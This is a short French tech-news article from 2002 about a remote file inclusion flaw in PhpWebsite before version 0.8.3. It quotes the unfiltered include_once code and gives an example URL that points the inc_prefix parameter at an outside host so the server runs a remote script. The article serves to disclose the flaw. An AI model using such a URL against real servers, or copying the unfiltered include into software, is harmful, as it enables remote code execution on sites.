Test du Antec 3-ledEnvoyerImprimer cette actualitéTéléchargez cette actualité au format pdfPhilips et la RIAA... la guerre serait-elle déclarée ?
> Info-Mods sur Facebook
> Actualités > Page 376
> Une faille dans PhpWebsite
(0 commentaire)
Flux RSSAddThis Feed Button

Une faille dans PhpWebsite

PhpWebsite est un outil qui permet aux développeurs de créer des plugins en php. Cependant, une faille de sécurité a été découverte : les versions avant la version 0.8.3 permettent l'exécution de n'importe quel script...

D'où vient la faille ? Du fichier modsecurity.php :

global $inc_prefix;
if(!$inc_prefix)
{}
include_once($inc_prefix."htmlheader.php");

Comme vous le voyez dans le code, aucun filtre n'a été prévu, offrant donc une faille grosse comme une maison en fournissant comme paramètre un chemin vers un script mal attentionné (ex : http://serveur.com/include_once.php?inc_prefix=http://www.tout-casser.com/

Source : Yacapa.com


Dans les boutiques




> Aucun commentaire posté pour le moment. Soyez le premier à réagir...


Rédigée le vendredi 27 septembre 2002 à 23h56 par Michaël Mulkens
Source : infomods

Il n'y a encore aucun commentaire posté

Les commentaires anonymes sont permis, mais il est préférable de s'identifier ou de s'inscrire.

Nom d'utilisateur

Mot de passe


Options :

Se logger anonymement

Se souvenir de moi


fleche Inscrivez-vous

Login avec Facebook Login avec Twitter


Votre identifiant : Anonyme




Code Bit

Insert Code




Sujets relatifs du forum

16/06 - Quel Antivirus
23/11 - Hacking Msn
31/01 - Spambully
Hacking, virus et sécurité

Pas d'article relatif, voici néanmoins nos derniers articles

Razer NagaIcy Box IB-550StU3SRazer TaipanPhanteks PH-TC14CSAkasa FC.SIX

Nouvelles plus anciennes

27/09 - 23:33 - Philips et la RIAA... la guerre serait-elle déc...

27/09 - 21:40 - Une version payante de Kazaa ?

27/09 - 12:20 - Test de 8 alimentations silencieuses

25/09 - 17:58 - NV18 chez Inpact

25/09 - 17:16 - Project IGI 2 - Nouvelles images

24/09 - 18:45 - Splendide mod !

23/09 - 22:23 - Spécification des radeons 9500

23/09 - 21:55 - Test du iomega zip 750 Mo

23/09 - 21:24 - L'alimentation !!!

23/09 - 20:40 - Kazaa 2,0 est la !

23/09 - 20:12 - Dans la boite...

23/09 - 19:58 - Test LCD Matrix Orbital (en)

23/09 - 19:12 - Neon bi et tri color

23/09 - 01:28 - Hercules 9700 Pro enfin disponible

22/09 - 21:05 - Alim silencieuse